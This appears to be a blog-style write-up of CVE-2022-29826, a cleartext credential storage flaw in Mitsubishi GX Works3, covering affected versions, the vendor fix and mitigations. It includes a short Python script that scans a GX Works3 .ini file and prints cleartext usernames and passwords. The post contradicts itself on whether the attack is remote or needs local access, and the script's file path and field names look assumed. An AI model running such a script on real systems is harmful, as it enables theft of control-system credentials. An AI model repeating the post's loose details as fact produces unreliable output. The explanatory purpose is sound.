CVE-2022-29826: Exploring the Cleartext Storage of Sensitive Information Vulnerability in Mitsubishi Electric GX Works3

In this post, we will explore a recently disclosed vulnerability in Mitsubishi Electric GX Works3, a popular software suite for configuring and programming Programmable Logic Controllers (PLCs). Identified as CVE-2022-29826, this vulnerability is categorized as a "Cleartext Storage of Sensitive Information" issue and exists in GX Works3 versions 1.086Q and prior. The vulnerability allows a remote unauthenticated attacker to disclose sensitive information, which may lead to unauthorized users viewing or executing programs illegally.

Exploit Details

The CVE-2022-29826 vulnerability arises due to the improper handling and storage of sensitive information by GX Works3. Instead of encrypting the data, the software stores it in cleartext, which makes it easily accessible to attackers who obtain unauthorized access to the system.

To exploit this vulnerability, an attacker would require access to the target system. Once they have gained access, they can easily locate and retrieve sensitive information stored in cleartext, such as credentials, IP addresses, and project files.

Here's a code snippet that demonstrates how an attacker might attempt to exploit this vulnerability

import os

# Locate the GX Works3 configuration file
config_file = "C:\Program Files (x86)\MELSOFT\GX Works3\ini\Gxw3.ini"

# Check if the file exists
if os.path.exists(config_file):
    # Open the file and read the content
    with open(config_file, 'r') as file:
        content = file.readlines()

    # Search for sensitive information in the content
    for line in content:
        # Check for cleartext credentials
        if 'Username' in line or 'Password' in line:
            # Print the cleartext credentials
            print("Cleartext credentials found:", line.strip())
else:
    print("Configuration file not found")

When executed on a compromised system, the script above searches the GX Works3 configuration file for cleartext usernames and passwords and prints them out if they are found.

Original References

1. CVE-2022-29826 - NIST National Vulnerability Database (NVD)
2. Mitsubishi Electric Advisory
3. ICS Advisory (ICSA-22-059-01) - Cybersecurity and Infrastructure Security Agency (CISA)

Mitigations

Mitsubishi Electric has acknowledged the vulnerability and released GX Works3 version 1.087A to address the issue. It is highly recommended that users of affected versions update their software as soon as possible to protect themselves from this vulnerability. Additionally, users should follow best practices for securing their systems and networks, such as implementing strong access controls, regularly monitoring for unauthorized access, and ensuring that all software is updated with the latest patches.

Conclusion

CVE-2022-29826 is a critical vulnerability in Mitsubishi Electric GX Works3 that exposes sensitive information to unauthorized individuals due to improper handling and storage of the information. By updating to the latest version of the software and following best practices for securing both software and networks, users can mitigate the risk of exploitation by attackers. If you suspect that your system has been compromised, it is essential to engage cybersecurity professionals to analyze and remediate the situation immediately.

Timeline

Published on: 11/25/2022 00:15:00 UTC
Last modified on: 11/28/2022 21:01:00 UTC